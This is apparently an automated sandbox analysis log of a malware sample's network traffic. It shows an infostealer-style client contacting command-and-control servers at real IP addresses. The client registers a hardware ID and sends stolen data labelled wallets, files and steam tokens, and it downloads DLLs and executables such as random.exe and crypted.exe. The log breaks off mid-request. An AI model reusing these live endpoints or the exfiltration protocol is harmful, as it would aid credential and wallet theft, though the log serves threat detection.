                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIEHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 2d 2d 0d 0a Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="message"plugins------HCAFIJDGHCBFHJKFCGIE--
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHCHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 2d 2d 0d 0a Data Ascii: ------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="message"fplugins------AFCAAEGDBKJJKECBKFHC--
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKKJEHDBGIDHJKJDBFHost: 185.215.113.206Content-Length: 7475Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAKJJDBGCAKKFHIJEGHHost: 185.215.113.206Content-Length: 999Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDBHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAKHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 2d 2d 0d 0a Data Ascii: ------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="file"------FHIECBAFBFHIJKFIJDAK--
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 2d 2d 0d 0a Data Ascii: ------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="file"------GHDHDBAECGCAFHJJDAKF--
                    Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCAKKKFBGDGCAKFCFHHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDBAFHCAKFBGCBFHIJHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 42 41 46 48 43 41 4b 46 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 42 41 46 48 43 41 4b 46 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 42 41 46 48 43 41 4b 46 42 47 43 42 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------KFIDBAFHCAKFBGCBFHIJContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------KFIDBAFHCAKFBGCBFHIJContent-Disposition: form-data; name="message"wallets------KFIDBAFHCAKFBGCBFHIJ--
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEGIIIECAKEBFBAAEHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 2d 2d 0d 0a Data Ascii: ------IDHIEGIIIECAKEBFBAAEContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------IDHIEGIIIECAKEBFBAAEContent-Disposition: form-data; name="message"files------IDHIEGIIIECAKEBFBAAE--
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGIDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 2d 2d 0d 0a Data Ascii: ------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="file"------BKJKJEHJJDAKECBFCGID--
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEGIIIECAKEBFBAAEHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 2d 2d 0d 0a Data Ascii: ------IDHIEGIIIECAKEBFBAAEContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------IDHIEGIIIECAKEBFBAAEContent-Disposition: form-data; name="message"ybncbhylepme------IDHIEGIIIECAKEBFBAAE--
                    Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGIEHIJKKFIDHDGIDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 2d 2d 0d 0a Data Ascii: ------HJJEGIEHIJKKFIDHDGIDContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------HJJEGIEHIJKKFIDHDGIDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HJJEGIEHIJKKFIDHDGID--
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: GET /img/pidgeon.exe HTTP/1.1Host: 87.120.125.254
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 35 35 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1005552001&unit=246122658369
                    Source: global trafficHTTP traffic detected: GET /files/crypted.exe HTTP/1.1Host: 31.41.244.11
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 35 36 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005561001&unit=246122658369
                    Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 35 36 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005562001&unit=246122658369
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 35 36 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005563001&unit=246122658369
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 11 Nov 2024 15:34:09 GMTIf-None-Match: "673223f1-1b8200"
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 41 44 43 42 33 46 46 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="hwid"F72ADCB3FF603810289448------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="build"mars------EHDAAECAEBKJKFHJKECF--
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 35 36 34 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005564031&unit=246122658369
                    Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 35 36 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005565001&unit=246122658369
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDAFBKFIECBGCAKECGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 41 44 43 42 33 46 46 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 2d 2d 0d 0a Data Ascii: ------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; 